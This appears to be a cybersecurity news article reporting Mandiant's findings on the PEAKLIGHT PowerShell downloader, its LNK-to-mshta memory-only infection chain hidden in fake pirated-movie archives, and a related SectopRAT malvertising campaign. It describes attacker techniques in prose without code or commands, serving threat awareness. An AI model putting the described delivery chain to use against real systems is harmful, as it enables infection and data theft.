Cybersecurity researchers have discovered a new dropper that acts as a gateway to deploy advanced malware on Windows systems with the aim of stealing information and loading malicious programs.
“This dropper operates in memory and runs a PowerShell-based downloader,” mentioned Google-owned Mandiant in a statement. “The PowerShell-based downloader is known as PEAKLIGHT.”
Various malware variants, such as Lumma Stealer, Hijack Loader (also called DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, are being distributed using this method, all available under the malware-as-a-service (SaaS) model.
The attack chain begins with a Windows shortcut (LNK) file downloaded through drive-by download tactics, like searching for movies on search engines. It’s important to note that these LNK files are hidden within ZIP archives disguised as pirated movies.
The LNK file connects to a content delivery network (CDN) hosting a hidden memory-only JavaScript dropper. This dropper then runs the PEAKLIGHT PowerShell downloader script on the system to communicate with a command-and-control (C2) server for additional payloads.
Mandiant has found various versions of the LNK files, some using asterisks (*) as wildcards to execute the legitimate mshta.exe binary and discreetly run malicious code (i.e., the dropper) fetched from a remote server.
Additionally, the droppers contain hex-encoded and Base64-encoded PowerShell payloads that are decoded to run PEAKLIGHT, which then delivers advanced malware to the compromised system while also downloading a legitimate movie trailer, likely as a diversion.
“PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain checking for ZIP archives in hardcoded file paths,” explained Mandiant researchers Aaron Lee and Praveeth D’Souza.
“If the archives are not present, the downloader will connect to a CDN site, download the remotely hosted archive file, and save it on the system.”
This revelation coincides with Malwarebytes’ explanation of a malvertising campaign using fake Google Search ads for Slack to redirect users to malicious sites hosting harmful installers that result in deploying a remote access trojan named SectopRAT.
